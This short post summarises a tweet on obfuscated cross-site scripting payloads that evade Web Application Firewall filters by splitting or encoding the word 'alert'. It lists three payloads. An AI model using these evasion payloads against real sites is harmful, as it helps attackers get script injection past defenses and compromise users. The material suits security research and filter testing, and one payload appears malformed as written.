A tweet shared a clever XSS WAF bypass technique using obfuscated payloads. The payloads obfuscate the 'alert' function to evade detection. The bypass payloads include: 1. (function(x){this[x+`ert`](1)})`al`, 2. window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2), 3. document['default'+'View'][`u0061lert`](3). Security researchers can use these techniques to bypass XSS filters in Web Application Firewalls. More details at the tweet link.
Original tweet: https://twitter.com/therceman/status/1803392781504610573